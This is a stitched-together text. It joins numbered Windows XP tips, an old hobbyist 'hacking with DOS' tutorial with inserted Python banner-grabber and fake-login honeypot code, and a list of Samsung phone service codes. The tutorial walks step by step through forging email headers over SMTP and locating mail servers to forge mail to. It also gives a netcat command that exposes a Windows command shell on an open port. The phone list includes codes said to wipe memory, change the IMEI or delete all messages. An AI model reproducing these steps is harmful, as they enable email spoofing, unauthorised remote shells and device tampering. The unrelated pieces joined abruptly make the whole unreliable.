    17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

    18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

    19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

    20. The successor to Windows XP, codenamed Longhorn, is due out late this month. The next big release, codenamed Blackcomb, is slated for 2010/2011.


    So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How
    can you use XP in a way that sets you apart from the boring millions of ordinary
    users?

    The key to doing amazing things with XP is as simple as D O S. Yes, that's
    right, DOS as in MS-DOS, as in Microsoft Disk Operating System. Windows XP (as
    well as NT and 2000) comes with two command shells, both loosely called DOS.
    Command.com is the old DOS version. Various versions of command.com come with
    Windows 95, 98, SE, ME, Windows 3.x, and DOS-only operating systems.

    The other, which comes only with XP, 2000 and NT, is cmd.exe. Usually
    cmd.exe is better than command.com because it is easier to use, has more
    commands, and in some ways resembles the bash shell in Linux and other Unix-type
    operating systems. For example, you can repeat a command by using the up arrow
    until you back up to the desired command. Unlike bash, however, your DOS command
    history is erased whenever you shut down cmd.exe. The reason XP has both
    versions is that sometimes a program that won't run right in cmd.exe will
    work in command.com.

    Note: I'm not comparing bash to DOS.


    DOS is your number one Windows gateway to the Internet, and the open sesame to
    local area networks. From DOS, without needing to download a single hacker
    program, you can do amazingly sophisticated explorations and even break into
    poorly defended computers.


    ****************
    You can go to jail warning: Breaking into computers is against the law if you do
    not have permission to do so from the owner of that computer. For example, if
    your friend gives you permission to break into her Hotmail account, that won't
    protect you because Microsoft owns Hotmail and they will never give you
    permission.
    ****************
    ****************
    You can get expelled warning: Some kids have been kicked out of school just for
    bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN
    permission before demonstrating that you can hack on a school computer.
    ****************

    So how do you turn on DOS?
    Click All Programs -> Accessories -> Command Prompt
    That runs cmd.exe. You should see a black screen with white text on it, saying
    something like this:

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\>

    Your first step is to find out what commands you can run in DOS. If you type
    "help" at the DOS prompt, it gives you a long list of commands. However, this
    list leaves out all the commands hackers love to use. Here are some of those
    left out hacker commands.

    TCP/IP commands:
    telnet
    netstat
    nslookup
    tracert
    ping
    ftp

    NetBIOS commands (just some examples):
    nbtstat
    net use
    net view
    net localgroup

    TCP/IP stands for Transmission Control Protocol/Internet Protocol. As you can
    guess by the name, TCP/IP is the protocol suite the Internet runs on, along
    with the User Datagram Protocol (UDP). So when you are connected to the Internet,
    you can try these commands against other Internet computers. Most local area
    networks also use TCP/IP.

    NetBIOS (Network Basic Input/Output System) is another way to communicate
    between computers. It is often used by Windows computers, and by Unix/Linux
    type computers running Samba. You can often use NetBIOS commands over the
    Internet (carried inside TCP/IP, so to speak). In many cases, however,
    NetBIOS commands will be blocked by firewalls. Also, not many Internet computers
    run NetBIOS because it is so easy to break in using them. I will cover NetBIOS
    commands in the next XP Hacking article.

    The queen of hacker commands is telnet. To get Windows help for telnet, in the
    cmd.exe window give the command:

    C:\>telnet /?

    Here's what you will get:

    telnet [-a][-e escape char][-f log file][-l user][-t term][host
    [port]]

    -a Attempt automatic logon. Same as -l option except uses the currently logged
    on user's name.
    -e Escape character to enter telnet client prompt.
    -f File name for client side logging
    -l Specifies the user name to log in with on the remote system. Requires that
    the remote system support the TELNET ENVIRON option.
    -t Specifies terminal type. Supported term types are vt100, vt52, ansi and vtnt
    only.
    host Specifies the hostname or IP address of the remote computer to connect to.
    port Specifies a port number or service name.


    ****************
    Newbie note: what is a port on a computer? A computer port is sort of like a
    seaport. It's where things can go in and/or out of a computer. Some ports are
    easy to understand, like keyboard, monitor, printer and modem. Other ports are
    virtual, meaning that they are created by software. When that modem port of
    yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has
    the ability to open or close any of over 65,000 different virtual ports, and has
    the ability to connect to any of these on another computer - if it is running
    that port, and if a firewall doesn't block it.
    ****************
    ****************
    Newbie note: How do you address a computer over the Internet? There are two
    ways: by number or by name.
    ****************

    The simplest use of telnet is to log into a remote computer. Give the command:

    C:\>telnet targetcomputer.com (substituting the name of the computer you want to
    telnet into for targetcomputer.com)

    If this computer is set up to let people log into accounts, you may get the
    message:

    login:

    Type your user name here, making sure to be exact. You can't swap between lower
    case and capital letters. For example, user name Guest is not the same as guest.

    ****************
    Newbie note: Lots of people email me asking how to learn what their user name
    and password are. Stop laughing, darn it, they really do. If you don't know your
    user name and password, that means whoever runs that computer didn't give you an
    account and doesn't want you to log on.
    ****************

    Then comes the message:

    Password:

    Again, be exact in typing in your password.

    What if this doesn't work?

    Every day people write to me complaining they can't telnet. That is usually
    because they try to telnet into a computer, or a port on a computer that is set
    up to refuse telnet connections. Here's what it might look like when a computer
    refuses a telnet connection:

    C:\>telnet 10.0.0.3
    Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A
    connection attempt failed because the connected party did not properly respond
    after a period of time, or established connection failed because connected host
    has failed to respond.

    Or you might see:

    C:\>telnet hotmail.com
    Connecting To hotmail.com...Could not open connection to the host, on port
    23. No connection could be made because the target machine actively refused it.

    If you just give the telnet command without giving a port number, it will
    automatically try to connect on port 23, which sometimes runs a telnet server.

    **************
    Newbie note: your Windows computer has a telnet client program, meaning it will
    let you telnet out of it. However you have to install a telnet server before
    anyone can telnet into port 23 on your computer.
    *************

    If telnet failed to connect, possibly the computer you were trying to telnet
    into was down or just plain no longer in existence. Maybe the people who run
    that computer don't want you to telnet into it.

    Even though you can't telnet into an account inside some computer, often you can
    get some information back or get that computer to do something interesting for
    you. Yes, you can get a telnet connection to succeed -without doing anything
    illegal --against almost any computer, even if you don't have permission to log
    in. There are many legal things you can do to many randomly chosen computers
    with telnet. For example:

    C:\>telnet freeshell.org 22

    SSH-1.99-OpenSSH_3.4p1

    That tells us the target computer is running an SSH server, which enables
    encrypted connections between computers. If you want to SSH into an account
    there, you can get a shell account for free at http://freeshell.org . You can
    get a free SSH client program from http://winfiles.com .
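    The banner grab above done in code, as an added Python example that is not part of the original guide: read the first line a service volunteers on connect (what telnet shows you) and, for SSH, decode the identification string. The banner SSH-1.99-OpenSSH_3.4p1 is the one from the text; banner_via_socketpair() replays it through a local socket pair so the example runs offline, while connect_and_grab() is the live version and should only be pointed at hosts you are permitted to probe.

```python
import socket

def grab_banner(sock, timeout=5.0, limit=255):
    """Read the first line a service volunteers on connect, as 'telnet host 22'
    displays it. Works wherever the server speaks first: SSH, SMTP, POP3, FTP."""
    sock.settimeout(timeout)
    buf = b""
    while not buf.endswith(b"\n") and len(buf) < limit:
        chunk = sock.recv(1)
        if not chunk:                       # peer closed without saying anything more
            break
        buf += chunk
    return buf.decode("ascii", "replace").rstrip("\r\n")

def connect_and_grab(host, port):
    """Live version: only against hosts you are permitted to probe."""
    with socket.create_connection((host, port), timeout=5.0) as s:
        return grab_banner(s)

def banner_via_socketpair(raw):
    """Offline stand-in for a remote service: the peer writes `raw`, we grab it."""
    client, server = socket.socketpair()
    try:
        server.sendall(raw)
        return grab_banner(client)
    finally:
        client.close()
        server.close()

def parse_ssh_banner(banner):
    """SSH identification string: SSH-protoversion-softwareversion [SP comments].
    A server that announces 1.99 accepts both protocol 1.x and 2.0 clients."""
    if not banner.startswith("SSH-"):
        raise ValueError("not an SSH identification string: %r" % banner)
    ident, _, comment = banner.partition(" ")
    _, proto, software = ident.split("-", 2)
    return {
        "proto": proto,
        "software": software,
        "comment": comment,
        "accepts_v1": proto.startswith("1."),
        "accepts_v2": proto in ("2.0", "1.99"),
    }

if __name__ == "__main__":
    banner = banner_via_socketpair(b"SSH-1.99-OpenSSH_3.4p1\r\n")   # the banner from the text
    print(banner)
    print(parse_ssh_banner(banner))
```

    The version string is the whole point of a banner grab: SSH-1.99 tells you the server still speaks protocol 1, and the software string gives you the exact release to look up.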

    ***************
    You can get punched in the nose warning: Your online provider might kick you off
    for making telnet probes of other computers. The solution is to get a local
    online provider and make friends with the people who run it, and convince them
    you are just doing harmless, legal explorations.
    *************

    Sometimes a port is running an interesting program, but a firewall won't let you
    in. For example, 10.0.0.3, a computer on my local area network, runs an email
    sending program (sendmail working together with Postfix, with Kmail to
    compose emails). I can use it from an account inside 10.0.0.3 to send emails
    with headers that hide from where I send things.

    If I try to telnet to this email program from outside this computer, here's what
    happens:

    C:\>telnet 10.0.0.3 25
    Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No
    connection could be made because the target machine actively refused it.

    However, if I log into an account on 10.0.0.3 and then telnet from inside to
    port 25, here's what I get:

    Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
    Have a lot of fun...
    cmeinel@test-box:~> telnet localhost 25
    Trying ::1...
    telnet: connect to address ::1: Connection refused
    Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning
    localhost, the same computer you are logged into]
    Connected to localhost.
    Escape character is '^]'.
    220 test-box.local ESMTP Postfix

    The reason I keep this port 25 hidden behind a firewall is to keep people from
    using it to try to break in or to forge email. Now the ubergeniuses reading this
    will start to make fun of me because no Internet address that begins with 10. is
    reachable from the Internet. However, sometimes I place this "test-box" computer
    online with a static Internet address, meaning whenever it is on the Internet,
    it always has the same numerical address. I'm not going to tell you what its
    Internet address is because I don't want anyone messing with it. I just want to
    mess with other people's computers with it, muhahaha. That's also why I always
    keep my Internet address from showing up in the headers of my emails.

    ***************
    Newbie note: What is all this about headers? It's stuff at the beginning of an
    email that may - or may not - tell you a lot about where it came from and when.
    To see full headers, in Outlook click view -> full headers. In Eudora, click the
    "Blah blah blah" icon.
    ****************

    Want a computer you can telnet into and mess around with, and not get into
    trouble no matter what you do to it? I've set up my techbroker.com
    (206.61.52.33) with user xyz, password guest for you to play with. Here's how to
    forge email to xyz@techbroker.com using telnet. Start with the command:

    C:\>telnet techbroker.com 25
    Connecting To Techbroker.com

    220 Service ready

    Now you type in who you want the message to appear to come from:

    helo santa@techbroker.com
    Techbroker.com will answer:

    250 host ready

    Next type in your mail from address:

    mail from:santa@techbroker.com

    250 Requested mail action okay, completed

    Your next command:

    rcpt to:xyz@techbroker.com
    250 Requested mail action okay, completed

    Your next command:
    data
    354 Start mail input; end with <CRLF>.<CRLF>


    <CRLF> just means hit return. In case you can't see that little
    period between the <CRLF>s, what you do to end composing your email is to hit
    enter, type a period, then hit enter again. Anyhow, try typing:

    This is a test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel

    Connection to host lost.

    Using techbroker's mail server, even if you enable full headers, the message we
    just composed looks like:

    Status: R
    X-status: N

    This is a test.

    That's a pretty pathetic forged email, huh? No "from", no date. However, you can
    make your headers better by using a trick with the data command. After you give
    it, you can insert as many headers as you choose. The trick is easier to show
    than explain:

    220 Service ready
    helo santa@northpole.org
    250 host ready
    mail from:santa@northpole.com
    250 Requested mail action okay, completed
    rcpt to:cmeinel@techbroker.com
    250 Requested mail action okay, completed
    data
    354 Start mail input; end with <CRLF>.<CRLF>
    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
    This is a Santa test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel

    Connection to host lost.

    The message then looks like:

    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
    This is a Santa test.

    The trick is to make each line you want in the headers look like a header: one
    word, a colon, the value, then return. As soon as you write a line that doesn't
    begin this way, the rest of what you type goes into the body of the email.
    Strictly speaking, the header block is ended by an empty line, so the clean way
    is to type a blank line between your last header and the first line of text.

    Notice that the santa@northpole.com from the "mail from:" command didn't show up
    in the header. Some mail servers would show both "from" addresses.

    You can forge email on techbroker.com within one strict limitation. Your email
    has to go to someone at techbroker.com. If you can find any way to send email to
    someone outside techbroker, let us know, because you will have broken our
    security, muhahaha! Don't worry, you have my permission.

    Next, you can read the email you forge on techbroker.com via telnet:

    C:\>telnet techbroker.com 110

    +OK <30961.5910984301@techbroker.com> service ready

    Give this command:
    user xyz
    +OK user is known

    Then type in this:
    pass test
    +OK mail drop has 2 message(s)

    retr 1
    +OK message follows
    This is a test.

    If you want to know all possible commands, give this command:

    help
    +OK help list follows
    USER user
    PASS password
    STAT
    LIST [message]
    RETR message
    DELE message
    NOOP
    RSET
    QUIT
    APOP user md5
    TOP message lines
    UIDL [message]
    HELP

    Unless you use a weird online provider like AOL, you can use these same tricks
    to send and receive your own email. Or you can forge email to a friend by
    telnetting to his or her online provider's email sending computer(s).

    With most online providers you need to get the exact name of their email
    computer(s). Often it is simply mail.targetcomputer.com (substitute the name of
    the online provider for targetcomputer). If this doesn't work, you can find out
    the name of their email server with the DOS nslookup program, which only runs
    from cmd.exe. Here's an example:


    C:\ >nslookup
    Default Server: DNS1.wurld.net
    Address: 206.61.52.11

    > set q=mx
    > dimensional.com
    Server: DNS1.wurld.net
    Address: 206.61.52.11

    dimensional.com MX preference = 5, mail exchanger =
    mail.dimensional.com
    dimensional.com MX preference = 10, mail exchanger =
    mx2.dimensional.com
    dimensional.com MX preference = 20, mail exchanger =
    mx3.dimensional.com
    dimensional.com nameserver = ns.dimensional.com
    dimensional.com nameserver = ns-1.dimensional.com
    dimensional.com nameserver = ns-2.dimensional.com
    dimensional.com nameserver = ns-3.dimensional.com
    dimensional.com nameserver = ns-4.dimensional.com
    mail.dimensional.com internet address = 206.124.0.11
    mx2.dimensional.com internet address = 206.124.0.30
    mx3.dimensional.com internet address = 209.98.32.54
    ns.dimensional.com internet address = 206.124.0.10
    ns.dimensional.com internet address = 206.124.26.254
    ns.dimensional.com internet address = 206.124.0.254
    ns.dimensional.com internet address = 206.124.1.254
    ns.dimensional.com internet address = 209.98.32.54
    ns.dimensional.com internet address = 206.124.0.32
    ns.dimensional.com internet address = 206.124.0.30
    ns.dimensional.com internet address = 206.124.0.25
    ns.dimensional.com internet address = 206.124.0.15
    ns.dimensional.com internet address = 206.124.0.21
    ns.dimensional.com internet address = 206.124.0.9
    ns-1.dimensional.com internet address = 206.124.26.254
    ns-2.dimensional.com internet address = 209.98.32.54
    ns-3.dimensional.com internet address = 206.124.1.254
    ns-4.dimensional.com internet address = 206.124.0.254
    >

    The lines that tell you what computers will let you forge email to people with
    @dimensional.com addresses are:

    dimensional.com MX preference = 5, mail exchanger =
    mail.dimensional.com
    dimensional.com MX preference = 10, mail exchanger =
    mx2.dimensional.com
    dimensional.com MX preference = 20, mail exchanger =
    mx3.dimensional.com

    MX stands for mail exchange. The lower the preference number, the more they
    would like you to use that address for email. If that lowest-numbered server is too
    busy, then try another server.

    Sometimes when you ask about a mail server, nslookup will give you this kind of
    error message:

    DNS request timed out.
    timeout was 2 seconds.
    DNS request timed out.
    timeout was 2 seconds.
    *** Request to [207.217.120.202] timed-out

    To get around this problem, you need to find out what are the domain servers for
    your target online provider. A good place to start looking is
    http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see
    http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers
    for any Internet address.

    ****************
    Newbie note: A domain name server provides information on the names and numbers
    assigned to computers on the Internet. For example, dns1.wurld.net and
    dns2.wurld.net contain information on happyhacker.org, techbroker.com,
    securitynewsportal.com, thirdpig.com and sage-inc.com. When you query
    dns1.wurld.net about other computers, it might have to go hunting for that
    information from other name servers. That's why you might get a timed out
    failure.
    ***************

    Once you know the domain servers for an online service, set one of them as the
    server for your nslookup program. Here's how you do it:

    C:\ >nslookup
    Default Server: DNS1.wurld.net
    Address: 206.61.52.11

    Now give the command:

    > server 207.217.126.41
    Default Server: ns1.earthlink.net
    Address: 207.217.126.41

    Next command should be:
    > set q=mx
    > earthlink.net
    Server: ns1.earthlink.net
    Address: 207.217.126.41

    earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
    earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
    earthlink.net nameserver = ns3.earthlink.net
    earthlink.net nameserver = ns1.earthlink.net
    earthlink.net nameserver = ns2.earthlink.net
    mx00.earthlink.net internet address = 207.217.120.28
    mx01.earthlink.net internet address = 207.217.120.29
    mx02.earthlink.net internet address = 207.217.120.79
    mx03.earthlink.net internet address = 207.217.120.78
    mx04.earthlink.net internet address = 207.217.120.249
    mx05.earthlink.net internet address = 207.217.120.31
    mx06.earthlink.net internet address = 207.217.120.23
    ns1.earthlink.net internet address = 207.217.126.41
    ns2.earthlink.net internet address = 207.217.77.42
    ns3.earthlink.net internet address = 207.217.120.43
    >

    Your own online service will usually not mind and may even be glad if you use
    telnet to read your email. Sometimes a malicious person or faulty email program
    will send you a message that is so screwed up that your email program can't
    download it. With telnet you can manually delete the bad email. Otherwise tech
    support has to do it for you.

    If you think about it, this ability to forge email is a huge temptation to
    spammers. How can your online provider keep the bad guys from filling up a
    victim's email box with garbage? The first time a bad guy tries this, probably
    nothing will stop him or her. The second time the online provider might block
    the bad guy at the firewall, maybe call the bad guy's online provider and kick
    him or her and maybe get the bad guy busted or sued.

    **************
    You can go to jail warning: Sending hundreds or thousands of junk emails to bomb
    someone's email account is a felony in the US.
    ***************

    ***************
    You can get sued warning: Spamming, where you send only one email to each
    person, but send thousands or millions of emails, is borderline legal. However,
    spammers have been successfully sued when they forge the email addresses of
    innocent people as senders of their spam.
    ****************

    Now that you know how to read and write email with telnet, you definitely have
    something you can use to show off with. Happy hacking!

    Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a
    free program written by Weld Pond and Hobbit, and available from many sites, for
    example
    http://www.atstake.com/research/tools/#network_utilities . It is basically
    telnet on steroids. For example, using netcat, you can set up a port on your
    Windows computer to allow people to telnet into a DOS shell by using this
    command:

    C:\>nc -L -p 5000 -t -e cmd.exe

    You can specify a different port number than 5000. Just make sure it doesn't
    conflict with another port by checking with the netstat command. Then you and
    your friends, enemies and random losers can either telnet in or netcat in with
    the command:

    C:\>nc -v [ipaddress of target] [port]

    Of course you will probably get hacked for setting up this port. However, if you
    set up a sniffer to keep track of the action, you can turn this scary back door
    into a fascinating honeypot. For example, you could run it on port 23 and watch
    all the hackers who attack with telnet hoping to log in. With some programming
    you could even fake a unix-like login sequence and play some tricks on your
    attackers.
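An added example (not the tutorial's own code) of the fake-login honeypot idea: a Python listener that shows a unix-style login prompt, records every username and password typed together with the peer address and time, and always refuses. The port 2323, the log file name and the three-attempt limit are assumptions; nothing here ever hands out a command shell.

```python
import datetime
import io
import socket
import threading

LOGIN_PROMPT = b"login: "
MAX_ATTEMPTS = 3      # assumed: close the session after this many refusals
LINE_LIMIT = 256      # cap on one line read, so a flood cannot eat memory


def _readline(rfile):
    """Read one line from the peer as text; None when the peer hangs up."""
    data = rfile.readline(LINE_LIMIT)
    if not data:
        return None
    return data.rstrip(b"\r\n").decode("utf-8", "replace")


def handle_session(rfile, wfile, peer="?", attempts=MAX_ATTEMPTS, now=None):
    """Run one fake login dialogue over file-like objects.

    Every username/password pair typed is recorded as
    (timestamp, peer, username, password) and the answer is always
    'Login incorrect'.  The records are returned so the caller can log
    them; working on file objects lets the same code run over a socket
    or, for testing, over in-memory streams.
    """
    if now is None:
        now = lambda: datetime.datetime.now(datetime.timezone.utc).isoformat()
    records = []
    wfile.write(b"\r\n" + LOGIN_PROMPT)
    wfile.flush()
    for attempt in range(attempts):
        user = _readline(rfile)
        if user is None:
            break
        wfile.write(b"Password: ")
        wfile.flush()
        password = _readline(rfile)
        if password is None:
            break
        records.append((now(), peer, user, password))
        wfile.write(b"\r\nLogin incorrect\r\n")     # never a shell prompt
        if attempt < attempts - 1:
            wfile.write(LOGIN_PROMPT)
        wfile.flush()
    return records


def run_scripted(client_input, peer="test"):
    """Drive handle_session with canned input; returns (records, bytes sent)."""
    rfile, wfile = io.BytesIO(client_input), io.BytesIO()
    records = handle_session(rfile, wfile, peer, now=lambda: "T0")
    return records, wfile.getvalue()


def _serve_one(conn, addr, log_path):
    peer = f"{addr[0]}:{addr[1]}"
    try:
        with conn:
            conn.settimeout(60)               # drop peers that go idle
            records = handle_session(conn.makefile("rb"), conn.makefile("wb"), peer)
    except OSError:
        return                                # peer reset or timed out
    with open(log_path, "a", encoding="utf-8") as log:
        for ts, p, user, password in records:
            log.write(f"{ts} {p} user={user!r} password={password!r}\n")


def serve(host="127.0.0.1", port=2323, log_path="honeypot.log"):
    """Listen and hand each connection to a thread.  Port 2323 is an assumed
    unprivileged stand-in for 23."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
            threading.Thread(target=_serve_one, args=(conn, addr, log_path),
                             daemon=True).start()


if __name__ == "__main__":
    serve()
```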

    Exclusive Stuff : Samsung Mobile

    *#06# -> Show IMEI
    *#9999# -> Show Software Version
    *#0837# -> Show Software Version (instructions)
    *#0001# -> Show Serial Parameters
    *#9125# -> Activates the smiley when charging.
    *#9998*228# -> Battery status (capacity, voltage, temperature)
    *#9998*246# -> Program status
    *#9998*289# -> Change Alarm Buzzer Frequency
    *#9998*324# -> Debug screens
    *#9998*364# -> Watchdog
    *#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.
    *#9998*427# -> Trace Watchdog
    *#9998*523# -> Change LCD contrast - Only with version G60RL01W
    *#9998*544# -> Jig detect
    *#9998*636# -> Memory status
    *#9998*746# -> SIM File Size
    *#9998*778# -> SIM Service Table
    *#9998*785# -> RTK (Run Time Kernel) errors - if ok then phone is reset, info is put in memory error.
    *#9998*786# -> Run, Last UP, Last DOWN
    *#9998*837# -> Software Version
    *#9998*842# -> Test Vibrator - Flash the screenlight during 10 seconds and vibration activated.
    *#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected
    *#9998*872# -> Diag
    *#9998*947# -> Reset On Fatal Error
    *#9998*999# -> Last/Chk
    *#9998*9266# -> Yann debug screen (=Debug Screens?)
    *#9998*9999# -> Software version

    *0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
    *0002*?# -> unknown
    *0003*?# -> unknown

    SP-unlock SGH-600 and SGH 2100

    *2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset )
    But it also changes the IMEI to 447967-89-400044-0. To restore your old IMEI use the IMEI program found on the software page.

    *2767*2878# -> Custom EEPROM Reset ( does not change the security CODE )




    Latest


    *#1111# S/W Version
    *#1234# Firmware Version
    *#2222# H/W Version
    *#8999*8376263# All Versions Together

    *#8999*8378# Test Menu
    *#4777*8665# GPSR Tool
    *#8999*523# LCD Brightness
    *#8999*377# Error Menu
    *#8999*327# EEP Menu
    *#8999*3825523# Don't Know.
    *#8999*667# Debug Mode
    *#92782# PhoneModel (Wap)
    #*5737425# JAVA Mode
    *#2255# Call List
    *#232337# Bluetooth MAC Address
    *#5282837# Java Version

    #*4773# Incremental Redundancy
    #*7752# 8 PSK uplink capability bit
    #*7785# Reset wakeup & RTK timer variables
    #*1200# ????
    #*7200# Tone Generator Mute
    #*3888# BLUETOOTH Test mode
    #*#8999*324# ??
    #*7828# Task screen
    #*5111# ??
    #*#8377466# S/W Version & H/W Version
    #*2562# Restarts Phone
    #*2565# No Blocking? General Defense.
    #*3353# General Defense, Code Erased.
    #*3837# Phone Hangs on White screen
    #*3849# Restarts Phone
    #*3851# Restarts Phone
    #*3876# Restarts Phone
    #*7222# Operation Typ: (Class C GSM)
    #*7224# !!! ERROR !!!
    #*7252# Operation Typ: (Class B GPRS)
    #*7271# CMD: (Not Available)
    #*7274# CMD: (Not Available)
    #*7337# Restarts Phone (Resets Wap Settings)
    #*2787# CRTP ON/OFF
    #*2886# AutoAnswer ON/OFF
    #*3737# L1 AFC
    #*5133# L1 HO Data
    #*7288# GPRS Detached/Attached
    #*7287# GPRS Attached
    #*7666# White Screen
    #*7693# Sleep Deactivate/Activate
    #*7284# L1 HO Data
    #*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
    #*2286# Databattery
    #*2527# GPRS switching set to (Class 4, 8, 9, 10)
    #*2679# Copycat feature Activa/Deactivate
    #*3940# External looptest 9600 bps
    #*4263# Handsfree mode Activate/Deactivate
    #*4700# Please use function 2637
    #*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
    #*2558# Time ON
    #*3370# Same as 4700
    #*3941# External looptest 115200 bps
    #*5176# L1 Sleep
    #*7462# SIM Phase
    #*7983# Voltage/Freq
    #*7986# Voltage
    #*8466# Old Time
    #*2255# Call Failed
    #*5187# L1C2G trace Activate/Deactivate
    #*5376# DELETE ALL SMS!!!!
    #*6837# Official Software Version: (0003000016000702)
    #*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
    #*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
    #*2337# Permanent Registration Beep
    #*2474# Charging Duration
    #*2834# Audio Path (Handsfree)
    #*3270# DCS Support Activate/Deactivate
    #*3282# Data Activate/Deactivate
    #*3476# EGSM Activate/Deactivate
    #*3676# FORMAT FLASH VOLUME!!!
    #*4760# GSM Activate/Deactivate
    #*4864# White Screen
    #*5171# L1P1
    #*5172# L1P2
    #*5173# L1P3
    #*7326# Accessory
    #*7683# Sleep variable
    #*8465# Time in L1
    #*2252# Current CAL
    #*2836# AVDDSS Management Activate/Deactivate
    #*3877# Dump of SPY trace
    #*7728# RSAV
    #*2677# Same as 4700
    #*3797# Blinks 3D030300 in RED
    #*3728# Time 2 Decod
    #*3725# B4 last off
    #*7372# Resetting the time to DPB variables
    #*7732# Packet flow context bit Activate/Deactivate
    #*6833# New uplink establishment Activate/Deactivate
    #*3273# EGPRS multislot (Class 4, 8, 9, 10)
    #*7722# RLC bitmap compression Activate/Deactivate
    #*2351# Blinks 1347E201 in RED
    #*4472# Hysteresis of serving cell: 3 dB
    #*2775# Switch to 2 inner speaker
    #*9270# Force WBS
    #*7878# FirstStartup (0=NO, 1=YES)
    #*3757# DSL UART speed set to (LOW, HIGH)
    #*8726# Switches USBACM to Normal
    #*8724# Switches USBACM to Generator mode
    #*8727# Switches USBACM to Slink mode
    #*8725# Switches USBACM to Loop-back mode
    #*3838# Blinks 3D030300 in RED
    #*2077# GPRS Switch
    #*2027# GPRS Switch
    #*0227# GPRS Switch
    #*0277# GPRS Switch
    #*22671# AMR REC START
    #*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
    #*22673# Pause REC
    #*22674# Resume REC
    #*22675# AMR Playback
    #*22676# AMR Stop Play
    #*22677# Pause Play
    #*22678# Resume Play
    #*77261# PCM Rec Req
    #*77262# Stop PCM Rec
    #*77263# PCM Playback
    #*77264# PCM Stop Play
    #*2872# CNT
    *#8999*283# ???
    #*22679# AMR Get Time
    *288666# ???
    *2886633# ???
    *#8999*364# Watchdog ON/OFF
    #*8370# Tfs4.0 Test 0
    #*8371# Tfs4.0 Test 1
    #*8372# Tfs4.0 Test 2
    #*8373# Tfs4.0 Test 3
    #*8374# Tfs4.0 Test 4
    #*8375# Tfs4.0 Test 5
    #*8376# Tfs4.0 Test 6
    #*8377# Tfs4.0 Test 7
    #*8378# Tfs4.0 Test 8
    #*8379# Tfs4.0 Test 9
    #837837# error=...

    #*36245# Turns Email TestMenu on.

    *2767*22236245# Email EPP set (....)!
    *2767*837836245# Email Test Account!
    *2767*29536245# Email Test2 Account!
    *2767*036245# Email EPP reset!
    *2767*136245# Email EPP set (1)!
    *2767*736245# Email EPP set (7)!
    *2767*3036245# Email...
    *2767*3136245# Email...
    *2767*3336245# Email...
    *2767*3436245# Email...
    *2767*3936245# Email...
    *2767*4136245# Email...
    *2767*4336245# Email...
    *2767*4436245# Email...
    *2767*4536245# Email...
    *2767*4636245# Email...
    *2767*4936245# Email...
    *2767*6036245# Email...
    *2767*6136245# Email...
    *2767*6236245# Email...
    *2767*6336245# Email...
    *2767*6536245# Email...
    *2767*6636245# Email...
    *2767*8636245# Email...
    *2767*85236245# Email...

    *2767*3855# = E2P Full Reset
    *2767*2878# = E2P Custom Reset
    *2767*927# = E2P Wap Reset
    *2767*226372# = E2P Camera Reset
    *2767*688# Reset Mobile TV
    #7263867# = RAM Dump (On or Off)
    *2767*49927# = Germany WAP Settings
    *2767*44927# = UK WAP Settings
    *2767*31927# = Netherlands WAP Settings
    *2767*420927# = Czech WAP Settings
    *2767*43927# = Austria WAP Settings
    *2767*39927# = Italy WAP Settings
    *2767*33927# = France WAP Settings
    *2767*351927# = Portugal WAP Settings
    *2767*34927# = Spain WAP Settings
    *2767*46927# = Sweden WAP Settings
    *2767*380927# = Ukraine WAP Settings
    *2767*7927# = Russia WAP Settings
    *2767*30927# = GREECE WAP Settings
    *2767*73738927# = WAP Settings Reset
    *2767*49667# = Germany MMS Settings
    *2767*44667# = UK MMS Settings
    *2767*31667# = Netherlands MMS Settings
    *2767*420667# = Czech MMS Settings
    *2767*43667# = Austria MMS Settings
    *2767*39667# = Italy MMS Settings
    *2767*33667# = France MMS Settings
    *2767*351667# = Portugal MMS Settings
    *2767*34667# = Spain MMS Settings
    *2767*46667# = Sweden MMS Settings
